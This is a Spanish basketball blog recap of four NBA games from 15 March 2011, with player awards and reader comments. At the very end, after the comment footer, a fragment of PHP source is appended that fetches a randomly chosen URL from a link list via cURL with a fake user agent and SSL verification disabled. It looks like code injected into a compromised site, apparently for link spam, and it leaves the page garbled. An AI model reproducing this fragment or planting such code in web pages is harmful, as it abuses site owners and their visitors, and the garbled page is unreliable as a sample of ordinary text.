La Crónica (15/03/2011)

16 de March de 2011 por TheDeerHunter

Jornada escueta de cuatro partidos sin grandes duelos entre pesos pesados.

Sirvió para que los Chicago Bulls se coloquen nada menos que primeros de la conferencia Este gracias a su cómoda victoria ante los Wizards (79-98). De poco sirvió el triple doble de McGee con 12 pinchos de merluza incluidos o la gran actuación de Jordan Crawford. Ni siquiera pesó la baja de última hora por fiebre de Noah, además de la ya conocida de Boozer. Los Bulls, sin mostrarse excepcionalmente brillantes, controlaron el juego y sus titulares de turno marcaron la diferencia con Rose y Deng a la cabeza.

Si la regular terminara hoy sus rivales en primera ronda serían los Pacers. Se encuentran en plena fase ascendente de su particular montaña rusa este curso y anoche le birlaron la cartera a unos Knicks que no logran sacar rendimiento a su “Big Three” (117-119). Stoudamire no logró capturar un gran pase de Billups con el partido dos abajo en su última posesión. Antes de eso habíamos disfrutado nuevamente de la capacidad resolutoria de Carmelo, pero también la de Granger. Mientras, Tyler Hansbrough continúa dejando en evidencia a su antiguo técnico.

Los Bucks se empeñan en no presentar batalla por la postemporada y eso que el listón tampoco está tan alto. Ayer dieron otro paso atrás en Atlanta llegando a duras penas a 85 puntos (85-110). Gran versión de Bogut, pero penosa de Jennings. Los Hawks plantearon un “small-ball” con Teague+Hinrich y Joe Johnson de 3. Funcionó de maravilla y a Marvin Williams no pareció afectarle negativamente cuajando un muy buen partido.

Finalmente los Mavs no fueron capaces de doblegar a los Blazers en un extraordinario choque en el Rose Garden (101-104). Inmenso duelo Nowitzki vs Aldridge y más inmenso todavía Brandon Roy en la ejecución del “Roysistema”. Unos minutos finales muy esperanzadores para los aficionados de Portland. Rudy también contribuyó a la victoria con detalles decisivos en momentos críticos del partido.

PREMIOS

MVP: Parejita de oro en los Hawks. Joe Johnson se fue a los 36 puntos (13 de 19) y Josh Smith consiguió 17 (8 de 12) más 14 rebotes, 4 asistencias y 4 tapones.

Rookie: Completísima actuación de un John Wall que jugó 46 minutos frente Derrick Rose. Wall anotó 17 puntos que complementó con 11 rebotes, 7 asistencias y 4 robos. Su compañero, Jordan Crawford, anotó 27 puntos.

Sorpresa: Triple doble de Javale McGee con 12 puntos, 11 rebotes y ¡12 tapones! Nadie había alcanzado semejante cantidad desde Keon Clark en 2001. Ya ha llovido.

Decepción: Deplorable partido de Brandon Jennings (4 puntos, 1 de 8 en tiros de campo, 2 asistencias). No es momento de flojear si quieres llegar a los Playoffs.

Esfuerzo en vano: Esta vez Dirk Nowitzki topó con un roca muy dura de derribar. Los Blazers se llevaron el gato al agua a pesar de los 28 puntos y 11 rebotes el alemán.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Ru dice:
    #1

    Ya se vislumbraba que Jordan Crawford haría buenos números con minutos,esos que se le negaron en los Hawks a pesar de la buena Summer League que hizo.

    Como ha crecido Aldridge esta temporada,que gustazo….

      Citar

  2. Busky23 dice:
    #2

    Bueno pues ahí están los Bulls asaltando el trono del Este a los verdes,de la mano de Rose y a pesar de las continuas bajas. Para mi no hay debate,gustará más o menos pero el mvp cada vez lo tengo más claro.
    Derrota de Dallas que cede su posición a unos Lakers en modo “Threepeat”.
    Partidaco de B. Roy asumiendo su nuevo rol a la perfección,ayudando al equipo sin forzar ni abusar en los tiros,estos Blazers prometen.
    Deseando estoy de que empiecen los playoffs.

      Citar

  3. Viva_Dirk dice:
    #3

    A los Pacers les hace falta mojarse el culo de verdad este verano para empezar a ser un equipo fuerte, posiblemente sea el equipo con mas ‘buenos jugadores’ de la liga, Rush, TJ Ford, McRoberts, Foster, D.Jones, Mike Dunleavy, es un banquillo muy bueno, y un quinteto con Collison-Granger-George-Hansbrouh-Hibbert tiene una media de edad de 24 años, la pareja interior es realmente buena, de las que permiten jugar en estático como pocas en la liga, asi que lo único que les queda es moverse bien y llevar a una estrella exterior al equipo, preferentemente un escolta poniendo a George como pieza de cambio, aunque hay muchos mas bases que escoltas, y ese equipo con Paul o Deron deberia mejorar muchísimo.

      Citar

  4. Scriers dice:
    #4

    Tjford creo que está en el paro. A mi Indiana no me gusta, pero en estos dos partidos contra los nicks me han sorprendido positivamente.

      Citar

  5. Denise dice:
    #5

    Tremendo lo de Javale McGee. Es sorpresa por los 12 tapones, pero potencialmente y con lo joven que es, estamos hablando de un asiduo 14-12 para los años venideros
    Un tipo así es lo que le hace falta a los Heat para culminar su gran proyecto.

      Citar

  6. rastud dice:
    #6

    también hay que nombrar las mandarinas que se estuvo tirando para conseguir su triple-doble

      Citar

  7. mariano dice:
    #7

    es curioso ver a Mcgee cuando falla el tiro libre que le daba el triple doble jugarselas todas xD
    y a la quinta o asi cuando lo consigue el tio celebrandolo y el equipo palmando de 20…que tio mas grande jaja

      Citar

  8. CAMPO2 dice:
    #8

    Ajero dice que la inoperancia en el ataque de los Bucks la tiene Jenings y su inoperancia con la mano derecha. Dice skiles que es un problema

      Citar

  9. Viva_Dirk dice:
    #9

    Jennings tiene muchísimo que mejorar, el talento lo tiene pero necesita horas y horas de disciplina.

      Citar

  10. Len Bias dice:
    #10

    Ajero? Inoperancia con la mano?

    qué grande Ajero

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>